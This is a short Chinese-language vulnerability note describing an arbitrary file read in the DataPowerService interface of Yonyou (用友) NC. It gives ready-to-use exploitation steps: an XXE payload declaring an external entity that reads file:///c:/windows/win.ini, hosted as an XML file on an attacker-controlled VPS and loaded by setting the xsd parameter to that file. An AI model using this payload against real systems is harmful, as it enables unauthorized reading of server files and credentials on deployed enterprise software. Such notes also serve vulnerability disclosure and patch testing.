漏洞描述:
用友NC DataPowerService接口存在任意文件读取,备注需要:需要VPS上建立对应操作系统的xml文件,然后开启http服务。xml文件为:<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///c://windows/win.ini">]><user><username>&name;</username><password>1</password></user>,然后在路径中xsd=VPS上建立的文件,则能达到任意文件读取